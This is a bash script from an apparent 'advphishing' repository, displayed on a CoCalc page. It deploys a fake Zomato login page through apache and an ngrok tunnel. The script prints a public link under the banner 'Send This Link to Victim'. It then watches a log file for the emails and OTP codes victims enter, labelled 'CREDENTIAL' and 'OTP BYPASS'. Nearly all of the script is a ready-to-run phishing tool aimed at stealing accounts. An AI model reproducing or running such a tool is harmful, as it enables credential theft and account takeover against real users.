Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
ignitetch
GitHub Repository: ignitetch/advphishing
Path: blob/master/sites/Zomato-Phishing/Zomato.sh
738 views
1
#!/bin/bash
2
3
stop() {
4
5
checkngrok=$(ps aux | grep -o "ngrok" | head -n1)
6
if [[ $checkngrok == *'ngrok'* ]]; then
7
pkill -f -2 ngrok > /dev/null 2>&1
8
killall -2 ngrok > /dev/null 2>&1
9
fi
10
if [[ -e sendlink ]]; then
11
rm -rf sendlink
12
fi
13
14
}
15
16
sleep 2
17
# spinner
18
spinlong ()
19
{
20
bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
21
barlenght=${#bar}
22
i=o
23
while ((i < 100 )); do
24
n=$((i*barlenght / 100 ))
25
printf "\e[00;32m\r[%-${barlenght}s]\e[00m" "${bar:0:n}"
26
((i += RANDOM%5+2))
27
sleep 0.4
28
done
29
}
30
31
32
#clolors
33
white='\e[1;37m'
34
green='\e[0;32m'
35
blue='\e[1;34m'
36
red='\e[1;31m'
37
yellow='\e[1;33m'
38
39
40
41
echo""
42
echo""
43
clear
44
echo -e $yellow " ╦ ╦╔═╗╦ ╔═╗╔═╗╔╦╗╔═╗ ╔╦╗╔═╗ ╔═╗╔═╗╔╦╗╔═╗╔╦╗╔═╗ ╔═╗╦ ╦╦╔═╗╦ ╦╦╔╗╔╔═╗ "
45
echo -e $yellow " ║║║║╣ ║ ║ ║ ║║║║║╣ ║ ║ ║ ╔═╝║ ║║║║╠═╣ ║ ║ ║───╠═╝╠═╣║╚═╗╠═╣║║║║║ ╦ "
46
echo -e $yellow " ╚╩╝╚═╝╩═╝╚═╝╚═╝╩ ╩╚═╝ ╩ ╚═╝ ╚═╝╚═╝╩ ╩╩ ╩ ╩ ╚═╝ ╩ ╩ ╩╩╚═╝╩ ╩╩╝╚╝╚═╝ "
47
echo -e $white " +++++++++++++++++++++++++++ OTP BYPASS ++++++++++++++++++++++++++++++++++ "
48
49
echo ""
50
echo ""
51
echo -e $'\e[1;32m[\e[0m\e[1;77m+\e[0m\e[1;32m]\e[0m\e[1;33m >> DOWNLOAD REQUIREMENTS >> \e[0m'
52
sleep 2
53
echo""
54
sudo apt-get install apache2
55
apt install php
56
apt install jq
57
apt install tail
58
apt install curl
59
systemctl start apache2
60
apt install xterm
61
apt install gnome-terminal
62
systemctl restart apache2.service
63
mkdir /var
64
mkdir /var/www
65
mkdir /var/www/html
66
mv /var/www/html/* /var/www/
67
rm -rf /var/www/html/*
68
cp -R * /var/www/html/
69
cd ..
70
clear
71
cd /var/www/html/
72
chmod +x *
73
chmod 7777 *
74
sleep 3
75
clear
76
./ngrok http 80 > /dev/null &
77
78
echo ""
79
echo -e $'\e[1;31m[\e[0m\e[1;77m+\e[0m\e[1;33m]\e[0m\e[1;92m >> WAIT FOR NGROK UP !\e[0m'
80
sleep 25
81
echo ""
82
clear
83
./Logo.sh
84
echo ""
85
echo -e $yellow "// [ Send This Link to Victim ] //"
86
echo ""
87
echo -e $white
88
curl -s localhost:4040/api/tunnels | jq -r .tunnels[1].public_url
89
curl -s localhost:4040/api/tunnels | jq -r .tunnels[0].public_url
90
echo ""
91
echo ""
92
echo -e $green "// [ CREDENTIAL ] //"
93
echo ""
94
tail -f log.txt | grep -e "email" -e "otp" -e "OTP"
95
96
97
98
;;
99
100
101